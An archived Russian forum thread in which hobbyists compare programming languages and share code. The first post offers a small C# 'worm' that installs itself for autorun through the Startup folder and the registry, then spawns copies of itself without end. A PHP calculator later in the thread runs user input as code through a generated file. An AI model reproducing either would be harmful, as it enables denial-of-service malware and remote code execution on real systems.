Здравствуйте, гость ( Вход | Регистрация )

Данный форум находится в архиве!


Последние новости C&C читайте на нашем сайте


Пообщаться можно в группе Вконтакте

8 страниц V  1 2 3 > »   
Ответить в эту темуОткрыть новую тему
> Программирование, кто на чём? делимся опытом. помогаем новичкам.
~IL~
сообщение 10.6.2010, 9:35
Сообщение #1


Майор

Группа: Пользователи
Сообщений: 1 091
Регистрация: 10.6.2009
Пользователь №: 3 283
Поблагодарили: 603 раз



здрасте все, кто сюда забрёл
всем форумчанам предлагаю поучаствовать в этой теме

мне хотелось бы, чтобы любители программирования (надеюсь таковые найдутся) поделились своим опытом друг с другом, а так же привлекали новичков в свои ряды. 54.gif

ещё неплохо было бы если бы вы написали, на чём вы программируете и в чём достоинства вашего языка или компилятора.

я недавно начал программировать на C#. компилятор SharpDevelop 3.2
мне нравится этот компилятор, очень удобный интерфейс, доступ к свойствам объектов открывается через точку, так же сразу создается ехе-файл, который готов к употреблению)

до этого писал простенькие программки типа калькулятора)
щас представляю на ваш суд код своего червячка))
показать офф-топ

using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;
using Microsoft.Win32;
using System.IO;
using System.Diagnostics;
using System.Resources;

namespace a
{
public partial class MainForm : Form
{
public MainForm()
{
Opacity = 0;
//InitializeComponent();
string my_program_path = Application.ExecutablePath.ToString(); //путь к нашей проге
string executable_file_path = "c:/documents and settings/all users/главное меню/программы/автозагрузка/err.exe"; //будущий путь к нашему вирусу

//копирование вируса в автозагрузку
if (!File.Exists(executable_file_path))
File.Copy(my_program_path, executable_file_path);

//запись в реестр
string reg_folder = @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\";
RegistryKey reg = null;
reg = Registry.LocalMachine.OpenSubKey(reg_folder, true);
if (reg != null)
{
reg.SetValue("my_autorun", executable_file_path);
}

//тело вируса
while (true)
Process.Start(executable_file_path);

//удаление из реестра
//reg = Registry.LocalMachine.OpenSubKey(reg_folder, true);
//reg.DeleteValue("my_autorun");

}
}
}

кому что будет не понятно - с радостью объясню)


Эскизы прикрепленных изображений
Прикрепленное изображение Прикрепленное изображение
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Nomad
сообщение 10.6.2010, 10:01
Сообщение #2


Бригадный Генерал

Группа: Заблокированные
Сообщений: 2 504
Регистрация: 14.3.2009
Из: Город-Герой Черкасы,Украина
Пользователь №: 2 940
Поблагодарили: 394 раз



Круть а мы сейчас в коледже Делфи проходим,ты как на счет Делфи 7?
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Akellis
сообщение 10.6.2010, 10:23
Сообщение #3


Сержант

Группа: Пользователи
Сообщений: 215
Регистрация: 30.4.2010
Пользователь №: 4 373
Поблагодарили: 14 раз



Когда программировал на Unity Javascript, пришлось его выучить =D
Сейчас, так как занимаюсь Саурсом, приходится программировать на C++. Слава богу есть средние знания, по крайней мере могу понять, где ошибка, с лёгкостью читать исходники =D
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Куков
сообщение 10.6.2010, 10:55
Сообщение #4


Mechatronix

Группа: Главные модеры
Сообщений: 2 074
Регистрация: 28.1.2009
Из: Soviet Empire
Пользователь №: 2 717
Поблагодарили: 610 раз



Раньше с легкостью программировал на VB 6 и паскале, учился работать на с++ и с++.net , но егэ и прочие дела мешают заниматься программированием как хобби.

Использую майкрософт висуал студио - 8ую для с++ и какую то 99 года для VB 6
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
IwanS
сообщение 10.6.2010, 12:30
Сообщение #5


Император

Группа: Администраторы
Сообщений: 5 112
Регистрация: 18.5.2008
Пользователь №: 1 903
Поблагодарили: 993 раз



Ох ну и тема 54.gif Программирую на QBasic, TPascal, C++, C#, есть проекты на Java (надо было написать, сам язык я не учил). Ну и традиционное PHP, JS и т.п. Лучше всего знаю PHP и C++. Проще всего программировать на C#, по-моему. Из сред использую Visual Studio 2008 и Borland Pascal 7 и MS QB1.0.

Что-нибудь показать... Ну на php написал вот это http://fs.xtud.ru/ и вот это http://math.xtud.ru/ . На C++ написал вот это, просто демонстрация классов и наследований. Так, что еще... На паскале и басике ниче не хочу показывать, это детсад, у меня на форуме 25 страниц басикного кода, и это еще не считая удаленных сообщений, а то так было бы все 50.

В догонку хочу сказать, что программировать на чистом C# бессмысленно, любой программист C# должен уметь использовать .net библиотеки и знать об их функциях и возможностях, и очень желательно графику.

Какие мысли по этому поводу? Ненавижу задротство с типами данных в C++ ограниченность библиотеки math.h в вопросах работы с системами счисления.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Куков
сообщение 10.6.2010, 13:24
Сообщение #6


Mechatronix

Группа: Главные модеры
Сообщений: 2 074
Регистрация: 28.1.2009
Из: Soviet Empire
Пользователь №: 2 717
Поблагодарили: 610 раз



А вот код вируса я бы попросил удалить ибо без того этого Г хватает. 40.gif

Я бы тебе посоветовал не червяков писать, а что нить полезное.

Мой самый первый проект 54.gif делая его я обучался бейсику. )
Прикрепленный файл  ______________.rar ( 297.24 килобайт ) Кол-во скачиваний: 261
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
user№3213
сообщение 10.6.2010, 14:03
Сообщение #7


Юзверь

Группа: Пользователи
Сообщений: 5 071
Регистрация: 22.5.2009
Из: Остров Таймыр
Пользователь №: 3 213
Поблагодарили: 719 раз



можно один вопрос
для чего предназначены различные языки?
я не говорю конкретно какой, я спрашиваю в общем.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Куков
сообщение 10.6.2010, 14:14
Сообщение #8


Mechatronix

Группа: Главные модеры
Сообщений: 2 074
Регистрация: 28.1.2009
Из: Soviet Empire
Пользователь №: 2 717
Поблагодарили: 610 раз



Ну дак их писали разные люди для разных целей и каждый считает(ну наверняка) что его язык лучше(я знаю только 3 разных компилятора с++ а их скорее всего больше), другое дело что язык может устареть и потому сравнить паскаль и визуал С нельзя, ну только если синтаксис.

Другое обьяснение: вот скажем VB придуман специально для того что бы писали программы для виндоус, и он в люниске работать не будет.

Затем языки для веб технологий на с++ сайты не пишут а вот на PHP пишут

И так можно продолжать долго. Короче говоря каждый язык создан для своей ниши с целью переплюнуть конкурентов, или для того что бы упростить процесс создания программ(но и это селано что бы переплюнуть конкурентов XD)
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
GraYaSDF
сообщение 10.6.2010, 14:43
Сообщение #9


Ищите меня на forums.gametarget.ru

Группа: Пользователи
Сообщений: 2 329
Регистрация: 4.12.2008
Из: Москва
Пользователь №: 2 448
Поблагодарили: 273 раз



Есть базовые знания Turbo Pascal и Borland Delphy. В основном программирую с помощью Action Script (специализированный язык). Опыт - более 5 лет.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Dukat863
сообщение 10.6.2010, 16:08
Сообщение #10


Lorem ipsum dolor sit amet

Группа: Пользователи
Сообщений: 2 213
Регистрация: 8.6.2009
Из: Ростов-на-Дону, Красная зона
Пользователь №: 3 277
Поблагодарили: 554 раз



Программирую на C++ и GML (Game Maker Language).

Люблю следующую конструкцию (интерпретатор позволяет):
показать офф-топ
Код
//GML, не C++

switch (true)
{
case (msg='help'):break;
case (msg='exit'):break;
}
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
~IL~
сообщение 10.6.2010, 18:07
Сообщение #11


Майор

Группа: Пользователи
Сообщений: 1 091
Регистрация: 10.6.2009
Пользователь №: 3 283
Поблагодарили: 603 раз



я пока ещё только начинающий программист, и буду очень рад сотрудничеству
я тут нашёл штуковину "индусский код"=) такая тема прикольная
вот ссылка больше всего радует пример №4 54.gif
и ещё быдлокод на C++, где заменяются команды языка на свои) и пишешь в свободном стиле
кстати этот код компилируется и исполняется (считает элементы массива, и ещё чё-то...)
быдлокод прикрепляю в файле, потому что там много мата))) компилятор нашего форума не одобрит)


Прикрепленные файлы
Прикрепленный файл  __.rar ( 70 байт ) Кол-во скачиваний: 179
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Anubis
сообщение 10.6.2010, 19:01
Сообщение #12


Полковник

Группа: Пользователи
Сообщений: 1 515
Регистрация: 19.3.2009
Из: Kiev
Пользователь №: 2 968
Поблагодарили: 127 раз



Шикарная ссылка)))
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
~IL~
сообщение 10.6.2010, 19:11
Сообщение #13


Майор

Группа: Пользователи
Сообщений: 1 091
Регистрация: 10.6.2009
Пользователь №: 3 283
Поблагодарили: 603 раз



Цитата(Nomad @ 10.6.2010, 11:01) *

Круть а мы сейчас в коледже Делфи проходим,ты как на счет Делфи 7?

честно говоря никак)
мы прошли С++ и С#-немного... у нас препод пишет проги на C# в основном.
ночами работает, на парах спит.
в школе проходил Q-Basic и Turbo Pascal
паскаль прошел мимо))) да и бейсик уже плохо помню)

Цитата(IwanS @ 10.6.2010, 13:30) *

=) прикольно. эт ты типа для каждого значения х считал значение функции и умножал на шаг, потом складывал?))
это на PHP сделано? просто вроде это можно сделать ещё точнее стандартными средствами языка, по крайней мере я думаю в си это можно реализовать...

у меня завтра как раз экзамен по статистике) там есть вопрос об интервальных статистических рядах... такая муть..
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
IwanS
сообщение 10.6.2010, 20:01
Сообщение #14


Император

Группа: Администраторы
Сообщений: 5 112
Регистрация: 18.5.2008
Пользователь №: 1 903
Поблагодарили: 993 раз



Цитата
=) прикольно. эт ты типа для каждого значения х считал значение функции и умножал на шаг, потом складывал?))это на PHP сделано? просто вроде это можно сделать ещё точнее стандартными средствами языка, по крайней мере я думаю в си это можно реализовать...

На си есть стандартная функция вычисления определенного интеграла, это понятно. Но в PHP нет никаких средств для решения интегралов, вот и приходится методом трапеций считать. Конечно, можно найти первообразную, но это задротство.

Код этой фигни, которую я сделал, вот:

показать офф-топ
Код
<?php

function funcparce($x, $func) {
    $func = str_replace('x', '$_SESSION["x"]', $func);
    $_SESSION["x"] = $x;
    if (!file_exists('./exec.php')) {
        $fid = fopen('./exec.php', 'wt');
        fwrite($fid, '<?PHP $_SESSION["result"] = '.$func.'; ?>');
        fflush($fid);
        fclose($fid);
    }
    require('./exec.php');
    $result = $_SESSION['result'];
    return $result;
    }

$_SESSION['title'] = 'Определенный интеграл';

include '../tpl/header.php';

if ($_POST['step'] == '') $_POST['step'] = '0.0001';
if ($_POST['step'] < 0.0001) $_POST['step'] = '0.0001';

echo '<center><form action="./index.php" method="post"><table border="0" width="300px">';
echo '<tr><td width="30px"><input type="text" size="2" name="up" value="'.$_POST['up'].'"></td><td></td></tr>';
echo '<tr><td width="30px"><img src="int.png"></td><td><input type="text" size="30" name="int" value="'.$_POST['int'].'">&nbsp;<i>dx</i></td></tr>';
echo '<tr><td width="30px"><input type="text" size="2" name="dn" value="'.$_POST['dn'].'"></td><td></td></tr>';
echo '</table>Укажите точность: <input type="text" size="5" name="step" value="'.$_POST['step'].'">&nbsp;<input type="submit" value="РЕШИТЬ!"></form></center>';

echo '<div class="topinfo"><b>Внимание: </b>функция степени пишется как pow(основание, степень). Если интеграл не решается, нажать <a href="./fix.php">сюда</a> и попробовать снова! Если интеграл все равно не считается (в случае если пределы интегрирования отличаются значительно, поставьте меньшую точность.</div><br>';

if ($_POST['int'] != '') {
    if ($_POST['up'] > $_POST['dn']) { $up = $_POST['up']; $x = $_POST['dn']; $mn = 1; } else { $up = $_POST['dn']; $x = $_POST['up']; $mn = -1; }
    $step = $_POST['step'];
    $y = funcparce($x, $_POST['int']);
    while ($x <= $up) {
        $pry = $y;
        $x = $x + $step;
        $y = funcparce($x, $_POST['int']);
        $fsum = $fsum + ($pry + $y)*$step/2;
        }
    unlink('./exec.php');
    $fsum = $fsum * $mn;
    if ($_POST['up'] == $_POST['dn']) $fsum = 0;
    echo 'Искомый интеграл = '.$fsum;
    }

include '../tpl/footer.php';

?>




Кстати вдогонку насчет индусского программирования. Вот вам прога, где идет генерация из одного RND, то есть обычная ситуация:

показать офф-топ
Код
CLS
RANDOMIZE TIMER
DIM a(10)
INPUT "Vvesti N: ", n
FOR j = 1 TO n
x = INT(RND * 10 + 1)
a(x) = a(x) + 1
NEXT j
FOR i = 1 TO 10
PRINT i; "("; a(i); ")", " = ";
FOR j = 1 TO INT(a(i) / n * 100)
PRINT "#";
NEXT j
PRINT
NEXT i


А вот прога, где идет то что упомянуто в статье, то есть (RND+RND+RND)/3:

показать офф-топ
Код
CLS
RANDOMIZE TIMER
DIM a(10)
INPUT "Vvesti N: ", n
FOR j = 1 TO n
x = INT((RND + RND + RND) / 3 * 10 + 1)
a(x) = a(x) + 1
NEXT j
FOR i = 1 TO 10
PRINT i; "("; a(i); ")", " = ";
FOR j = 1 TO INT(a(i) / n * 100)
PRINT "#";
NEXT j
PRINT
NEXT i


Для тех кто в танке, N = количество проходов, имеет смысл ставить значение 1000...1000000, лучше конечно миллион.

Обратите внимание на распределение случайной величины в зависимости от одного рандомайза, и трех. Вывод очевиден - при одном видим равномерное распределение, при трех - нормальное. Но это в QBasic, в C++ сделаю такое чуть попозже...


Поблагодарили:
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
LostLegion
сообщение 10.6.2010, 20:31
Сообщение #15


Капитан

Группа: Пользователи
Сообщений: 964
Регистрация: 20.5.2009
Из: Города на Волге, Самара
Пользователь №: 3 209
Поблагодарили: 260 раз



А я вот не умею пока программировать) Посоветуйте с чего лучше начинать 54.gif
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Avenger
сообщение 10.6.2010, 21:08
Сообщение #16


Бригадный Генерал

Группа: Пользователи
Сообщений: 2 804
Регистрация: 30.5.2009
Из: GDI Infantry Barracks
Пользователь №: 3 245
Поблагодарили: 1239 раз



Цитата(LostLegion @ 10.6.2010, 21:31) *

А я вот не умею пока программировать) Посоветуйте с чего лучше начинать 54.gif

Думаю лучше с Паскаля. Старая школа...


Поблагодарили:
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
~IL~
сообщение 10.6.2010, 21:23
Сообщение #17


Майор

Группа: Пользователи
Сообщений: 1 091
Регистрация: 10.6.2009
Пользователь №: 3 283
Поблагодарили: 603 раз



Цитата(Avenger @ 10.6.2010, 22:08) *

Думаю лучше с Паскаля. Старая школа...

мне кажется не важно с чего начинать
лучше уже сразу с того языка, который тебе нужен
главное - хороший учебник.. или учитель)
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
IwanS
сообщение 10.6.2010, 21:53
Сообщение #18


Император

Группа: Администраторы
Сообщений: 5 112
Регистрация: 18.5.2008
Пользователь №: 1 903
Поблагодарили: 993 раз



Ни в коем случае не с паскаля,он сейчас нафиг никому не нужен. Лучше с С++.

Кстати насчет генерации случайных чисел в C++:

Вот прога, которая генерирует числа с одним rand():

показать офф-топ
Код
#include "stdafx.h"
#include <iostream>
#include <time.h>
using namespace std;

int main() {
    int n, cnt, cnt2, x; int w[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
    srand(time(NULL));
    
    cout << "Enter cycles reply: ";
    cin >> n;
    for (cnt = 1; cnt < n; cnt++) {
        x = (int)(rand() % 10)+1;
        w[x] = w[x] + 1;
    }
    cout << endl;
    for (cnt = 1; cnt < 10; cnt++) {
        cout << cnt << " (" << w[cnt] << ") = \t";
        for (int cnt2 = 1; cnt2 < (w[cnt] * 100 / n); cnt2++) cout << "#";
        cout << endl;
    }
    cin >> cnt2;
    return 0;
}


а вот прога, которая делает то же самое с тремя rand():

показать офф-топ
Код
#include "stdafx.h"
#include <iostream>
#include <time.h>
using namespace std;

int main() {
    int n, cnt, cnt2, x; int w[10] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0};
    srand(time(NULL));
    
    cout << "Enter cycles reply: ";
    cin >> n;
    for (cnt = 1; cnt < n; cnt++) {
        x = (int)((rand()+rand()+rand()) / 3 % 10)+1;
        w[x] = w[x] + 1;
    }
    cout << endl;
    for (cnt = 1; cnt < 10; cnt++) {
        cout << cnt << " (" << w[cnt] << ") = \t";
        for (int cnt2 = 1; cnt2 < (w[cnt] * 100 / n); cnt2++) cout << "#";
        cout << endl;
    }
    cin >> cnt2;
    return 0;
}


Вот такие пироги. Так что если кто-то из вас умеет программировать, вперед проверять гипотезу о нормальном распределении среднеарифметического трех случайных.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Avenger
сообщение 10.6.2010, 22:02
Сообщение #19


Бригадный Генерал

Группа: Пользователи
Сообщений: 2 804
Регистрация: 30.5.2009
Из: GDI Infantry Barracks
Пользователь №: 3 245
Поблагодарили: 1239 раз



Да, ладно. В Паскале всё очень просто и доступно изложено. Это как стартовая площадка.

Цитата(IwanS @ 10.6.2010, 22:53) *

Ни в коем случае не с паскаля,он сейчас нафиг никому не нужен. Лучше с С++.

Верно, он никому не нужен. Но что бы понять основы, он подойдёт.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
IwanS
сообщение 10.6.2010, 22:12
Сообщение #20


Император

Группа: Администраторы
Сообщений: 5 112
Регистрация: 18.5.2008
Пользователь №: 1 903
Поблагодарили: 993 раз



Цитата
Верно, он никому не нужен. Но что бы понять основы, он подойдёт.

Нет, он дает дурные привычки типа не надо инициализировать переменные значениями. Дело ваше, я не рекомендую начинать с паскаля. С++ лучше для новичков и профессионалов. Это базовый язык современности.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
8 страниц V  1 2 3 > » 
Ответить в эту темуОткрыть новую тему
 

Текстовая версия Сейчас: 24.9.2020, 14:09
Rambler's Top100 CNC Top 101